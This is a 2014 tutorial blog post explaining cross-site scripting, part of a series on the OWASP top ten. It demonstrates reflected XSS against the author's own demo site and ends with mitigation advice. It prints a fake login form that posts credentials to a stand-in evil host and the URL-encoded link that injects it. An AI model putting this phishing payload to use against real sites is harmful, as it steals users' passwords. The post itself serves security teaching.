OWASP 03 - Cross Site Scripting (XSS)

24 Aug 2014

The third vulnerability on our trek through the OWASP top ten is Cross-Site Scripting, commonly known as XSS. It’s easy to overlook the danger of XSS, as it primarily affects the client side. But, user credentials can be leaked and sites can be rendered unusable by client side scripts.

Demonstration

The “hack yourself first” security sandbox doesn’t appear to be vulnerable to these kind of shenanigans, so we’ll turn to an alternative this time around. Not wanting to pick on a real site, I’ve created my own little demo site to attack at http://softwarealchemist.net/web-vulnerability-demo-site/ . This is a simple, single page site that just performs a Google image search on behalf of the user.

Now, there are two broadly defined kinds of XSS attack:

The stored variety, where the attacker gets some malicious client side code into the application database, for it to be regurgitated at other users of the site at some later time.
The reflected variety, where the attacker constructs a link with the XSS payload encoded into the URL. The attacked site then blurts the payload back at the unsuspecting visitor who clicked the link.

As our demo site doesn’t have a database, we’re going to look at how a reflected XSS attack works.

Head to the demo page, and type in any word in the search box. Simple enough.

Now let’s see how well the site filters out dangerous inputs, try searching for <h1>something. The HTML we type in ends up rendered onto the page. Looks like the filtering isn’t very good at all (in fact, it’s non-existent).

So now, we’ll do something that would be potentially harmful to a user. On a real site, we’d be concerned about data entered by the user leaving the site (think of form fields, cookies, etc.). On our site, the only information provided by the user is the search term. However, if we think a little outside the box we could get more information.

One way of mounting an XSS attack is to inject a fake form into a legitimate site. In this case, we’ll ask the user for a username and password (it doesn’t really matter if the login is for this service or some other). The form posts to some other (evil) website, but it appears on the attacked site.

Our form might look like this:

  <form action='http://evil.example.com/getpassword'>
    Username: <input name='u' />
    Password: <input name='p' type='password' />
    <input type='submit' value='Login to Bookface' />
  </form>

The next question for an attacker is how to get people to type all that garbage in the search box. Of course, they don’t. Take a look at how the results page is loaded. It’s a GET request with everything right there in the query string. So we can construct a URL like this:

http://softwarealchemist.net/web-vulnerability-demo-site/?search-term=%3Cform%20action%3D%22http%3A%2F%2Fevil.example.com%2Fgetpassword%22%3EUsername%3A%20%3Cinput%20name%3D%22u%22%20%2F%3EPassword%3A%20%3Cinput%20name%3D%22p%22%20type%3D%22password%22%20%2F%3E%3Cinput%20type%3D%22submit%22%20value%3D%22Login%20to%20Bookface%22%20%2F%3E%3C%2Fform%3E

This means that the attacker can just post the link online and wait for an unsuspecting web user to click on it. The effectiveness of the attack hinges on how likely someone is to come across the link, click on it and fill out the form.

For many more (cute and harmless) examples, and to realise how wide spread this vulnerability is, have a look at the “kitten bombs” twitter account

Mitigation

This kind of attack is usually fairly easy to mitigate for any given input on any given page of your website or application, the tricky part is making sure that all inputs are guarded against.

Practically every framework you might use, server side or client side, has the capacity to escape outputs so that user supplied HTML and JavaScript cannot be emitted to the client side. (In fact, I had to go to some effort in the example site to allow user supplied HTML onto the page).

I would advise that, if you can, you periodically audit your codebase for risky outputs, using a linter or even just a quick grep. For example, in .NET view pages, you should rarely (if ever) use the unescaped <%= %> to produce output, preferring to use the escaped sequence (<%: %>).

Of course, the above advice only applies to times when yo udo not want any HTML from the user ending up on the page. It’s all a bit more finicky if you do want to allow a restricted subset (for example, on forums and wikis). In most cases, if you are building a business web application, you’ll want to avoid this if at all possible, and rely on a third party library if not. The usual advice about keeping your libraries up to date and regularly reading the bug tracker and release notes apply.

The Software Alchemist